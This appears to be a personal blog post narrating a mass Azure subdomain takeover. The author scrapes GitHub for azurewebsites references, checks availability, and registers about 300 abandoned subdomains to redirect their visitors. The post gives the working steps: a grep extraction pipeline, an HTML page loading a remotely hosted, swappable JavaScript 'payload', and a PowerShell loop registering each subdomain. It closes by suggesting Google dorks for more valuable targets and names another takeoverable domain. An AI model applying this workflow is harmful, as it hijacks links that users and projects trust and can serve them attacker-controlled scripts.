How I made 300 GitHub repos point to my blog using Azure subdomains takeover

Playing around in Azure portal, I saw that it is pretty easy to register/unregister an azurewebistes.com subdomain while deploying an application. The idea that came into my mind was “how many references to azurewebistes.com are out there which are no longer maintained, and are available for takeover?”

So I decided to look through GitHub repos, collect the URLs, check them, register them myself, and redirect the traffic to my own blog.

1. Find *.azurewebsites.com references

I didn’t feel like spending too much time on this PoC project, so I just intercepted the GitHub search request for “azurewebsites.com” in Burp and sent it to intruder to go over all the pages (around 75). This could have probably be done in a smarter way using GitHub API and tokens. Each page had ~10 references to Azure subdomains, so roughly 750 potential subdomain takeovers.

2. Collect ’em all

Once intruder was done, I saved all the HTTP response bodies to a file and using some grep-regex-bash-fu I extracted the subdomains.

cat azure_github.txt | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep azurewebsites | cut -d "/" -f 3-10 | sort -u

3. Check availability

Since not all subdomains I found were available for registration (either owner of the repo or someone else has registered them), I used the Azure Portal functionality to check which ones I can take over. Again, this can probably be done using Azure API, but the quick-and-dirty solution worked just fine so I intercepted the request in Burp and checked the availability for each domains I found.

The green mark indicates available, while the red cross the opposite.

In the response we can see that the "nameAvailable":true indicates that the subdomain is available for registration:

I send the request to intruder, and once it finished running and checking the whole list of subdmomains, I was left with around 300 subdomains that are referenced in GitHub repos, but are available for registration in Azure Portal. Neat 😎

4. Create a static web page

My first thought was to register each one of these domains and redirect the users to my own blog. I decided to use a simple static web page with JavaScript redirection as it requires little to no compute power which is what Azure charges on.

<!DOCTYPE html>
<html lang="en">
  <head>
  </head>
  <body>
    <script src="https://subdomainsjs.blob.core.windows.net/scripts/javascript.js"></script>
  </body>
</html>

5. Hosting the payload

Additionally, I created a Blob Container to host the JS payload, and be able to easily change it dynamically on all subdomains if needed.

6. Pew-Pew 🔫 Deploy

Once the HTML web page and the payload were ready, I wrote a script that went through each one of the subdomains and registered it. Initially I used the free tier service plan (F1) but that one is limited to less than 10 static web apps, so I had to upgrade to Basic plan (B3) which allowed me to host unlimited static web apps (unless they all exceed 10Gb which was not the case).

This costs around 80$ a month so I’m still considering whether it is worth it (at least for the subdomains I found on GitHub).

PS E:\azure_subdomains\html-docs-hello-world> foreach($line in  Get-Content "..\subdomains_takeover.txt"){az webapp up --sku B3 --name $line --resource-group 0xpwnlab --plan 0xpwnserviceplan --location "West Europe" --html}
Taking over the domain and pushing the HTML redirect page

7. Results

Finally, after several hours of registering and pushing HTML pages my Azure Portal was full of App Services:

Shortly after I started to see traffic coming from these domains:

8. Conclusion

Did it work? Yes. Was it worth it? I wouldn’t say so. The fact that most of these repso are old/unpopular/unkonwn/hobby-projects makes the amount of traffic gained pretty low compared with the price required to hosts the static pages on Azure. I would say a better approach is to use google dorks and hunt for dead links from more popular websites.

For example I found a (quite old) PDF documentation from Microsoft that’s referencing scientificwebsite.azurewebsites.net which is available for registration

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s